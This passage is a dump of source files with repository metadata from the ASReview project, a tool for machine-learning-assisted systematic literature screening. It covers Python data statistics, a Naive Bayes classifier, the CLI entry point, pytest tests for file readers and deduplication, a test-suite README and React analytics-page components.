License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.models.balance.double import DoubleBalance\nfrom asreview.models.balance.simple import SimpleBalance\nfrom asreview.models.balance.triple import TripleBalance\nfrom asreview.models.balance.undersample import UndersampleBalance\nfrom asreview.models.balance.utils import get_balance_class\nfrom asreview.models.balance.utils import get_balance_model\nfrom asreview.models.balance.utils import list_balance_strategies\n\n\"\"\"Balance strategies to rebalance and reorder the training data.\n\nThere are several balance strategies that rebalance and reorder the\ntraining data. This is sometimes necessary, because the data is often\nvery imbalanced: there are many more papers that should be excluded than\nincluded (otherwise, automation cannot help much anyway).\n\nThere are several balance strategies available. In configuration\nfiles, parameters are found under the section ``[balance_param]``.\n\"\"\"\n" }, { "alpha_fraction": 0.5991328358650208, "alphanum_fraction": 0.6050453186035156, "avg_line_length": 21.551111221313477, "blob_id": "15ab2da1616cf88032cbc4b52436d91fafa239fe", "content_id": "c164ad4cef3e19f3e47968ffff18d959f5d5a68b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5074, "license_type": "permissive", "max_line_length": 74, "num_lines": 225, "path": "/asreview/data/statistics.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\n\n\ndef n_records(data):\n \"\"\"Return the number of records.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n return len(data)\n\n\ndef n_relevant(data):\n \"\"\"Return the number of relevant records.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.labels is not None:\n return len(np.where(data.labels == 1)[0])\n return None\n\n\ndef n_irrelevant(data):\n \"\"\"Return the number of irrelevant records.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.labels is None:\n return None\n return len(np.where(data.labels == 0)[0])\n\n\ndef n_unlabeled(data):\n \"\"\"Return the number of unlabeled records.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.labels is None:\n return None\n return len(data.labels) - n_relevant(data) - n_irrelevant(data)\n\n\ndef n_missing_title(data):\n \"\"\"Return the number of records with missing titles.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n n_missing = 0\n if data.title is None:\n return None, None\n if data.labels is None:\n n_missing_included = None\n else:\n n_missing_included = 0\n for i in range(len(data.title)):\n if len(data.title[i]) == 0:\n n_missing += 1\n if data.labels is not None and data.labels[i] == 1:\n n_missing_included += 1\n return n_missing, n_missing_included\n\n\ndef n_missing_abstract(data):\n \"\"\"Return the number of records with missing abstracts.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n n_missing = 0\n if data.abstract is None:\n return None, None\n if data.labels is None:\n n_missing_included = None\n else:\n n_missing_included = 0\n\n for i in range(len(data.abstract)):\n if len(data.abstract[i]) == 0:\n n_missing += 1\n if data.labels is not None and data.labels[i] == 1:\n n_missing_included += 1\n\n return n_missing, n_missing_included\n\n\ndef title_length(data):\n \"\"\"Return the average length of the titles.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.title is None:\n return None\n avg_len = 0\n for i in range(len(data.title)):\n avg_len += len(data.title[i])\n return avg_len / len(data.title)\n\n\ndef abstract_length(data):\n \"\"\"Return the average length of the abstracts.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.abstract is None:\n return None\n avg_len = 0\n for i in range(len(data.abstract)):\n avg_len += len(data.abstract[i])\n return avg_len / len(data.abstract)\n\n\ndef n_keywords(data):\n \"\"\"Return the number of keywords.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n\n Return\n ------\n int:\n The statistic\n \"\"\"\n if data.keywords is None:\n return None\n return np.average([len(keywords) for keywords in data.keywords])\n\n\ndef n_duplicates(data, pid=\"doi\"):\n \"\"\"Number of duplicates.\n\n Duplicate detection can be a very challenging task. Multiple\n algorithms can be used and results can be vary.\n\n Arguments\n ---------\n data: asreview.data.ASReviewData\n An ASReviewData object with the records.\n pid: string\n Which persistent identifier (PID) to use for deduplication.\n Default is 'doi'.\n\n Return\n ------\n int:\n Number of duplicates\n \"\"\"\n return int(data.duplicated(pid).sum())\n" }, { "alpha_fraction": 0.764397919178009, "alphanum_fraction": 0.764397919178009, "avg_line_length": 62.66666793823242, "blob_id": "47671b88bd76960ed9a7d1caade8cfe9f5532491", "content_id": "a031cdc3ef73c432eb4cf0dcb135ce888fdb8fe7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 382, "license_type": "permissive", "max_line_length": 73, "num_lines": 6, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as AnalyticsPage } from \"./AnalyticsPage\";\nexport { default as NumberCard } from \"./NumberCard\";\nexport { default as ProgressChart } from \"./ProgressChart\";\nexport { default as ProgressDensityChart } from \"./ProgressDensityChart\";\nexport { default as ProgressRecallChart } from \"./ProgressRecallChart\";\nexport { default as ShareFabAction } from \"./ShareFabAction\";\n" }, { "alpha_fraction": 0.6843559741973877, "alphanum_fraction": 0.6970701813697815, "avg_line_length": 31.303571701049805, "blob_id": "0e0baa8d101e67af2cd86ee042971f956721d4f9", "content_id": "7d9e3de4fd893d5c50ab66ccaa3b3bf3d7f116fa", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1809, "license_type": "permissive", "max_line_length": 79, "num_lines": 56, "path": "/asreview/models/classifiers/nb.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\nfrom sklearn.naive_bayes import MultinomialNB\n\nfrom asreview.models.classifiers.base import BaseTrainClassifier\n\n\nclass NaiveBayesClassifier(BaseTrainClassifier):\n \"\"\"Naive Bayes classifier (``nb``).\n\n Naive Bayes classifier. Only works in combination with the\n :class:`asreview.models.feature_extraction.Tfidf` feature extraction model.\n Though relatively simplistic, seems to work quite well on a wide range of\n datasets.\n\n The naive Bayes classifier is an implementation based\n on the sklearn multinomial naive Bayes classifier.\n\n Arguments\n ---------\n alpha : float, default=3.822\n Additive (Laplace/Lidstone) smoothing parameter\n (0 for no smoothing).\n \"\"\"\n\n name = \"nb\"\n label = \"Naive Bayes\"\n\n def __init__(self, alpha=3.822):\n super(NaiveBayesClassifier, self).__init__()\n self.alpha = alpha\n self._model = MultinomialNB(alpha=alpha)\n logging.debug(self._model)\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n hyper_choices = {}\n hyper_space = {\n \"mdl_alpha\": hp.lognormal(\"mdl_alpha\", 0, 1),\n }\n return hyper_space, hyper_choices\n" }, { "alpha_fraction": 0.7761268019676208, "alphanum_fraction": 0.7771173715591431, "avg_line_length": 66.30000305175781, "blob_id": "0bec6b8dbd4d72d5209bb9f3109e614389ee78de", "content_id": "9641a7267c3d6f854c2bf276856283d335623197", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4038, "license_type": "permissive", "max_line_length": 703, "num_lines": 60, "path": "/asreview/webapp/tests/README.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# ASReview Test Suite\n\nThis folder contains the test suite of the ASReview app. It is organized in the following folders:\n\n- **config**: Contains data to create user accounts and a number of json files to start the ASReview app in different modes (e.g. authenticated, authentication with verification, etc).\n\n- **data**: Contains project data used in tests.\n\n- **integration_tests**: Forthcoming.\n\n- **test_api**: Contains API related tests. These tests are independent, unit-like tests.\n\n- **test_database_and_models**: Contains tests that focus on basic database operations and several SQL_Alchemy models that are used in the authenticated version of the ASReview app.\n\n- **test_extensions**: Forthcoming.\n\n- **utils**: Contains various helper files that facilitate writing tests.\n\n## Requirements\n\n1. [Pytest](https://docs.pytest.org/)\n2. [Pytest-random-order](https://github.com/jbasko/pytest-random-order)\n\n## Fixtures\n\nIf you are unfamiliar with Pytest: fixtures enable a setup and teardown mechanism for all tests. They ensure a controlled initial state and clean up afterwards to make sure the next test is conducted with a clean slate.\n\nIn this suite, all fixtures are defined in `conftest.py` files. These fixtures are automatically picked up by Pytest and can be found in the `/webapp/tests`-folder, but also in nested folders. The nested conftest modules use fixtures defined in the tests-folder without actually importing them: Pytest finds the required fixture if you use their function-name as parameter in either a newly defined fixture or test function.\n\nNote that the `conftest.py` in the `/webapp/tests` contains an important fixture `asreview_path_fixture`. This suite uses an alternative ASReview folder to avoid disrupting the data of the app in production or development mode. The `asreview_path_fixture` fixture ensures that for every test the ASReview app always starts with its own dedicated, temporary, ASReview folder. Pytest states that these folders are automatically removed (https://docs.pytest.org/en/7.1.x/how-to/tmp_path.html#the-default-base-temporary-directory). This might be unwanted behavior if checking the state of the ASReview folder is required. If so, simply create your own ASReview folder in the `asreview_path_fixture` fixture.\n\n## Test functions\n\nIdeally a test function tests one particular feature and can be executed independently from other test functions. If you would like to add a feature or an enhancement to the ASReview app, please accompany your code with appropriate tests. Append your tests to existing modules, or create a new module. If you are adding routes to the API, please wrap your test API calls in a function and place it in `/utils/api_utils.py`. If applicable, make sure your feature works both in an authenticated and an unauthenticated environment.\n\n## Running the tests\n\n**Important**: if you run the entire test stuite, please make sure you have compiles the app's assets:\n\n```\npython setup.py compile_assets\n```\n\nPlease run your tests with the `--random-order` option to ensure test independency. With Pytest you can run all tests within a particular module. For example (running from the asreview root-folder):\n\n```\npytest --random-order -s -v ./asreview/webapp/tests/test_api/test_projects.py\n```\n\nThe `-s` option enables capturing stdout (shows your print statements if there are any), and the `-v` option makes the output more verbose. Run an entire folder containing test modules like so:\n\n```\npytest --random-order -s -v ./asreview/webapp/tests/test_api/\n```\n\nIf you are in the middle of writing your tests, and your module contains many tests, it is more efficient to run a small cluster or a single test. One of the many possibilities is the `-k` option that executes only tests with a function name that ends with a certain postfix. In the next example we execute only test functions that end with the 'current`postfix in the`test_projects.py` module:\n\n```\npytest --random-order -s -v ./asreview/webapp/tests/test_api/test_projects.py -k current\n```\n" }, { "alpha_fraction": 0.43965962529182434, "alphanum_fraction": 0.4564208388328552, "avg_line_length": 26.309858322143555, "blob_id": "a42af53a37d0eece55d7adeda9e0d93e23dfb927", "content_id": "42a94a008d30897740deeea040ace231c650bf5a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3878, "license_type": "permissive", "max_line_length": 88, "num_lines": 142, "path": "/tests/test_data.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import urllib\nfrom pathlib import Path\n\nimport pandas as pd\nfrom pytest import mark\n\nimport asreview\nfrom asreview.data.base import ASReviewData\nfrom asreview.data.statistics import n_duplicates\nfrom asreview.datasets import DatasetManager\nfrom asreview.search import fuzzy_find\n\n\ndef exists(url):\n return urllib.request.urlopen(url).getcode() == 200\n\n\[email protected](\n \"keywords,paper_id\",\n [\n (\"bronchogenic duplication cyst\", 0),\n (\"diagnositc accuracy microscopy female priority\", 1),\n (\"immunophenotiping\", 4),\n (\"Foregut report embryoogenesis\", 4),\n (\"Liu Adler\", 0),\n (\"Khoury cysts\", 4),\n (\"Isolated Edwards\", 5),\n (\"Kwintanilla-djeck Neck\", 3),\n (\"Cancer case computer contrast pancreatomy Yamada\", 2),\n ],\n)\ndef test_fuzzy_finder(keywords, paper_id):\n fp = Path(\"tests\", \"demo_data\", \"embase.csv\")\n as_data = asreview.ASReviewData.from_file(fp)\n\n assert fuzzy_find(as_data, keywords)[0] == paper_id\n\n\[email protected](\n \"data_name\",\n [\n # datasets from the datasets repo\n \"benchmark:van_de_Schoot_2017\",\n \"benchmark:Hall_2012\",\n \"benchmark:Cohen_2006_ACEInhibitors\",\n \"benchmark:Bos_2018\",\n # datasets from the Van de Schoot et al. paper\n # https://github.com/asreview/paper-asreview/blob/master/index_v1.json\n \"benchmark-nature:van_de_Schoot_2017\",\n \"benchmark-nature:Hall_2012\",\n \"benchmark-nature:Cohen_2006_ACEInhibitors\",\n \"benchmark-nature:Kwok_2020\",\n ],\n)\ndef test_datasets(data_name):\n data = DatasetManager().find(data_name)\n assert exists(data.filepath)\n\n\ndef test_duplicate_count():\n d = ASReviewData.from_file(Path(\"tests\", \"demo_data\", \"duplicate_records.csv\"))\n\n assert n_duplicates(d) == 2\n\n\ndef test_deduplication():\n d_dups = ASReviewData.from_file(Path(\"tests\", \"demo_data\", \"duplicate_records.csv\"))\n\n s_dups_bool = pd.Series(\n [\n False,\n True,\n False,\n True,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n False,\n ]\n )\n\n # test whether .duplicated() provides correct boolean series for duplicates\n pd.testing.assert_series_equal(d_dups.duplicated(), s_dups_bool, check_index=False)\n\n d_nodups = ASReviewData(\n pd.DataFrame(\n {\n \"title\": [\"a\", \"b\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"\", \"\", \" \", \" \"],\n \"abstract\": [\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"\",\n \"\",\n \" \",\n \" \",\n ],\n \"doi\": [\n \"10.1\",\n \"10.3\",\n None,\n None,\n \" \",\n \" \",\n None,\n None,\n \"10.4\",\n \"10.5\",\n \"10.6\",\n \"10.7\",\n ],\n \"some_column\": [\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n \"lorem\",\n ],\n }\n )\n )\n\n # test whether .drop_duplicates() drops the duplicated records correctly\n pd.testing.assert_frame_equal(d_dups.drop_duplicates(), d_nodups.df)\n" }, { "alpha_fraction": 0.5234006643295288, "alphanum_fraction": 0.5255892276763916, "avg_line_length": 28.700000762939453, "blob_id": "b5d470322f80373859fb5cb16f8eaad7369c5885", "content_id": "1f217f9c2e5e52a14466ead5b58763454d4685b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5940, "license_type": "permissive", "max_line_length": 80, "num_lines": 200, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/AnalyticsPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useQuery } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport {\n EmailIcon,\n TwitterIcon,\n FacebookIcon,\n WeiboIcon,\n WhatsappIcon,\n} from \"react-share\";\nimport {\n Box,\n Button,\n CircularProgress,\n Fade,\n Grid,\n SpeedDial,\n SpeedDialAction,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { Share } from \"@mui/icons-material\";\n\nimport { PageHeader } from \"../../Components\";\nimport {\n NumberCard,\n ShareFabAction,\n ProgressChart,\n ProgressDensityChart,\n ProgressRecallChart,\n} from \"../AnalyticsComponents\";\nimport { TypographyH5Medium } from \"../../StyledComponents/StyledTypography.js\";\n\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { projectModes } from \"../../globals.js\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst actions = [\n { icon: <TwitterIcon round />, name: \"Twitter\" },\n { icon: <FacebookIcon round />, name: \"Facebook\" },\n { icon: <WeiboIcon round />, name: \"Weibo\" },\n { icon: <WhatsappIcon round />, name: \"WhatsApp\" },\n { icon: <EmailIcon round />, name: \"Email\" },\n];\n\nconst AnalyticsPage = (props) => {\n const { project_id } = useParams();\n\n const progressQuery = useQuery(\n [\"fetchProgress\", { project_id }],\n ProjectAPI.fetchProgress,\n { refetchOnWindowFocus: false },\n );\n const progressDensityQuery = useQuery(\n [\"fetchProgressDensity\", { project_id }],\n ProjectAPI.fetchProgressDensity,\n { refetchOnWindowFocus: false },\n );\n const progressRecallQuery = useQuery(\n [\"fetchProgressRecall\", { project_id }],\n ProjectAPI.fetchProgressRecall,\n { refetchOnWindowFocus: false },\n );\n\n const twitterRef = React.useRef(null);\n const facebookRef = React.useRef(null);\n const weiboRef = React.useRef(null);\n const whatsappRef = React.useRef(null);\n const emailRef = React.useRef(null);\n\n const handleShare = (platform) => {\n if (platform === \"Twitter\") {\n twitterRef.current?.click();\n }\n if (platform === \"Facebook\") {\n facebookRef.current?.click();\n }\n if (platform === \"Weibo\") {\n weiboRef.current?.click();\n }\n if (platform === \"WhatsApp\") {\n whatsappRef.current?.click();\n }\n if (platform === \"Email\") {\n emailRef.current?.click();\n }\n };\n\n const allQueriesReady = () => {\n return (\n !progressQuery.isFetching &&\n !progressDensityQuery.isFetching &&\n !progressRecallQuery.isFetching\n );\n };\n\n return (\n <Root aria-label=\"analytics page\">\n <Fade in>\n <Box>\n {props.mode !== projectModes.SIMULATION && (\n <PageHeader header=\"Analytics\" mobileScreen={props.mobileScreen} />\n )}\n {props.mode === projectModes.SIMULATION && (\n <Box\n className=\"main-page-sticky-header-wrapper\"\n sx={{ background: (theme) => theme.palette.background.paper }}\n >\n <Box className=\"main-page-sticky-header with-button\">\n {!props.mobileScreen && (\n <TypographyH5Medium>Analytics</TypographyH5Medium>\n )}\n {props.mobileScreen && (\n <Typography variant=\"h6\">Analytics</Typography>\n )}\n <Stack direction=\"row\" spacing={1}>\n <Button\n disabled={!allQueriesReady() || !props.isSimulating}\n variant=\"contained\"\n onClick={props.refetchAnalytics}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Refresh\n </Button>\n </Stack>\n </Box>\n </Box>\n )}\n {!allQueriesReady() && (\n <Box className=\"main-page-body-wrapper\">\n <CircularProgress />\n </Box>\n )}\n {allQueriesReady() && (\n <Box className=\"main-page-body-wrapper\">\n <Stack spacing={3} className=\"main-page-body\">\n <Box>\n <Grid container spacing={3}>\n <Grid item xs={12} sm={5}>\n <ProgressChart\n isSimulating={props.isSimulating}\n mobileScreen={props.mobileScreen}\n mode={props.mode}\n progressQuery={progressQuery}\n />\n </Grid>\n <Grid item xs={12} sm={7}>\n <NumberCard\n mobileScreen={props.mobileScreen}\n progressQuery={progressQuery}\n />\n </Grid>\n </Grid>\n </Box>\n <ProgressDensityChart\n mobileScreen={props.mobileScreen}\n progressDensityQuery={progressDensityQuery}\n />\n <ProgressRecallChart\n mobileScreen={props.mobileScreen}\n progressRecallQuery={progressRecallQuery}\n />\n </Stack>\n </Box>\n )}\n </Box>\n </Fade>\n {allQueriesReady() && (\n <SpeedDial\n ariaLabel=\"share project analytics\"\n className=\"main-page-fab\"\n icon={<Share />}\n >\n {actions.map((action) => (\n <SpeedDialAction\n key={action.name}\n icon={action.icon}\n tooltipTitle={action.name}\n onClick={() => {\n handleShare(action.name);\n }}\n />\n ))}\n </SpeedDial>\n )}\n <ShareFabAction\n progressQueryData={progressQuery.data}\n twitterRef={twitterRef}\n facebookRef={facebookRef}\n weiboRef={weiboRef}\n whatsappRef={whatsappRef}\n emailRef={emailRef}\n />\n </Root>\n );\n};\n\nexport default AnalyticsPage;\n" }, { "alpha_fraction": 0.6215340495109558, "alphanum_fraction": 0.6287360191345215, "avg_line_length": 31.29069709777832, "blob_id": "b41942266933db9b1ab2f6be3b22ceddda0a3773", "content_id": "d54c4d15fb5937020a7cd9c50bb2587f9725c5ff", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2777, "license_type": "permissive", "max_line_length": 85, "num_lines": 86, "path": "/asreview/__main__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Command Line Interface (CLI) for ASReview project.\"\"\"\nimport argparse\nimport sys\nfrom importlib.metadata import metadata\nfrom itertools import groupby\n\nfrom asreview import __version__\nfrom asreview.utils import _entry_points\n\n# Internal or deprecated entry points. These entry points\n# are not displayed in the help page of the user interface.\nINTERNAL_ENTRY_POINTS = [\"web_run_model\"]\nDEPRECATED_ENTRY_POINTS = [\"oracle\"]\n\n\ndef main():\n # Get the available entry points.\n base_entries = _entry_points(group=\"asreview.entry_points\")\n\n if (\n len(sys.argv) > 1\n and not sys.argv[1].startswith(\"-\")\n and sys.argv[1] not in base_entries.names\n ):\n raise ValueError(f\"'{sys.argv[1]}' is not a valid subcommand.\")\n\n elif len(sys.argv) > 1 and sys.argv[1] in base_entries.names:\n entry = base_entries[sys.argv[1]]\n entry.load()().execute(sys.argv[2:])\n\n else:\n description_subcommands = \"\"\n\n for name, dist_entry_points in groupby(\n base_entries, lambda e: e.dist.name,\n ):\n\n description = metadata(name)[\"Summary\"]\n version = metadata(name)[\"Version\"]\n description_subcommands += f\"\\n[{name} {version}] - {description}\\n\"\n\n for entry in dist_entry_points:\n if entry.name not in INTERNAL_ENTRY_POINTS + DEPRECATED_ENTRY_POINTS:\n description_subcommands += f\"\\t{entry.name}\\n\"\n\n parser = argparse.ArgumentParser(\n prog=\"asreview\",\n formatter_class=argparse.RawTextHelpFormatter,\n description=metadata(\"asreview\")[\"Summary\"],\n )\n parser.add_argument(\n \"subcommand\",\n nargs=\"?\",\n default=None,\n help=f\"The subcommand to launch. Available commands:\\n\\n\"\n f\"{description_subcommands}\",\n )\n\n parser.add_argument(\n \"-V\",\n \"--version\",\n action=\"version\",\n version=\"%(prog)s {version}\".format(version=__version__),\n )\n\n args, _ = parser.parse_known_args()\n\n parser.print_help()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.553432285785675, "alphanum_fraction": 0.5795918107032776, "avg_line_length": 29.799999237060547, "blob_id": "ae250055aeab3b06a60395b104e2a429090bd50f", "content_id": "32bf0b3c9c63bcddaa22cf9e61a3d912f8a2951b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5390, "license_type": "permissive", "max_line_length": 83, "num_lines": 175, "path": "/tests/test_readers.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nimport rispy\nfrom pytest import mark\n\nfrom asreview import ASReviewData\nfrom asreview.utils import is_url\n\n\[email protected](\n \"test_file,n_lines,ignore_col\",\n [\n (\"_baseline.ris\", 100, []),\n (\"embase.csv\", 6, [\"keywords\"]),\n (\"embase_newpage.csv\", 6, [\"keywords\"]),\n (\"embase.ris\", 6, []),\n (\"generic.csv\", 2, []),\n (\"generic_semicolon.csv\", 2, []),\n (\"generic_tab.csv\", 2, []),\n (\"generic_tab.tab\", 2, []),\n (\"generic_tab.tsv\", 2, []),\n (\"generic_labels.csv\", 6, []),\n (\"pubmed_zotero.ris\", 6, []),\n (\"pubmed_endnote.txt\", 6, []),\n (\"scopus.ris\", 6, []),\n (\"ovid_zotero.ris\", 6, []),\n (\"proquest.ris\", 6, []),\n (\"https://osf.io/download/fg93a/\", 38, []),\n ],\n)\ndef test_reader(test_file, n_lines, ignore_col):\n if is_url(test_file):\n fp = test_file\n else:\n fp = Path(\"tests\", \"demo_data\", test_file)\n\n as_data = ASReviewData.from_file(fp)\n assert len(as_data) == n_lines\n\n cols = [\"title\", \"abstract\", \"authors\", \"keywords\"]\n cols = [col for col in cols if col not in ignore_col]\n # if labels is not None:\n # cols.append('included')\n # assert np.array_equal(as_data.labels, labels)\n\n for col in cols:\n values = as_data.get(col)\n assert len(values) == n_lines\n\n\[email protected](\n \"record_i,included\",\n [\n # Single line record\n (0, 1),\n (1, 0),\n (2, -1),\n (3, -1),\n # Single line record with additional notes, label first\n (4, 1),\n (5, 0),\n (6, -1),\n # Single line record with additional notes, label in the middle\n (7, 1),\n (8, 0),\n (9, -1),\n # Single line record with additional notes, label last\n (10, 1),\n (11, 0),\n (12, -1),\n # Multiline record, label first\n (13, 1),\n (14, 0),\n (15, -1),\n # Multiline record, label in the middle\n (16, 1),\n (17, 0),\n (18, -1),\n # Multiline record, label last\n (19, 1),\n (20, 0),\n (21, -1),\n # Multiline record, with additional notes, label first\n (22, 1),\n (23, 0),\n (24, -1),\n # Multiline record, with additional notes, label in the middle\n (25, 1),\n (26, 0),\n (27, -1),\n # Multiline record, with additional notes, label last\n (28, 1),\n (29, 0),\n (30, -1),\n # No notes tag present\n (31, -1),\n ],\n)\ndef test_asreview_labels_ris(record_i, included):\n fp = Path(\"tests\", \"demo_data\", \"baseline_tag-notes_labels.ris\")\n as_data = ASReviewData.from_file(fp)\n assert as_data.record(record_i, by_index=True).included == included\n\n\ndef test_multiline_tags_ris():\n fp = Path(\"tests\", \"demo_data\", \"baseline_tag_and_field_definitions_lists.ris\")\n entries = rispy.load(fp, encoding=\"utf-8\")\n assert entries[0][\"notes\"] == [\"Notes 1\", \"Notes 2\"]\n\n\ndef test_nan_values_ris():\n fp = Path(\"tests\", \"demo_data\", \"baseline_empty_values.ris\")\n as_data = ASReviewData.from_file(fp)\n\n # Check missing titles\n assert as_data.record(1, by_index=True).title == \"\"\n assert as_data.record(3, by_index=True).title == \"\"\n\n # Check missing abstracts\n assert as_data.record(0, by_index=True).abstract == \"\"\n assert as_data.record(2, by_index=True).abstract == \"\"\n\n # Check missing authors\n assert as_data.record(0, by_index=True).authors is None\n assert as_data.record(2, by_index=True).authors is None\n\n # Check missing keywords\n assert as_data.record(0, by_index=True).keywords is None\n assert as_data.record(2, by_index=True).keywords is None\n\n # Check missing notes\n assert as_data.record(0, by_index=True).notes is None\n assert as_data.record(2, by_index=True).notes is None\n\n # check missing doi\n assert as_data.record(0, by_index=True).doi is None\n assert as_data.record(2, by_index=True).doi is None\n\n\ndef test_nan_values_csv():\n fp = Path(\"tests\", \"demo_data\", \"missing_values.csv\")\n as_data = ASReviewData.from_file(fp)\n\n # Check missing titles\n assert as_data.record(1, by_index=True).title == \"\"\n assert as_data.record(3, by_index=True).title == \"\"\n\n # Check missing abstracts\n assert as_data.record(0, by_index=True).abstract == \"\"\n assert as_data.record(2, by_index=True).abstract == \"\"\n\n # Check missing authors\n assert as_data.record(0, by_index=True).authors is None\n assert as_data.record(2, by_index=True).authors is None\n\n # Check missing keywords\n assert as_data.record(0, by_index=True).keywords is None\n assert as_data.record(2, by_index=True).keywords is None\n\n # Check missing doi\n assert as_data.record(0, by_index=True).doi is None\n assert as_data.record(2, by_index=True).doi is None\n\n\ndef test_write_data(tmpdir):\n fp_in = Path(\"tests\", \"demo_data\", \"generic_labels.csv\")\n fp_out = Path(tmpdir, \"generic_out.csv\")\n asr_data = ASReviewData.from_file(fp_in)\n asr_data.to_file(fp_out, labels=[[0, 0], [2, 1], [3, 1]])\n\n tmp_csv_fp_out = Path(tmpdir, \"tmp_generic_labels.csv\")\n asr_data.to_file(tmp_csv_fp_out)\n asr_data_diff = ASReviewData.from_file(tmp_csv_fp_out)\n # Check if export file includes labels [1,0]\n assert list(asr_data.labels) == list(asr_data_diff.labels)\n" }, { "alpha_fraction": 0.5589743852615356, "alphanum_fraction": 0.5675213932991028, "avg_line_length": 26, "blob_id": "f1a1c57b002888ea02e7d46e41250fc6d3e88cc4", "content_id": "016502468bb73c1a8e59f9687b1c2fcb9df16d75", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1755, "license_type": "permissive", "max_line_length": 80, "num_lines": 65, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/DashboardPageHeader.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport {\n Avatar,\n Box,\n IconButton,\n Stack,\n Tooltip,\n 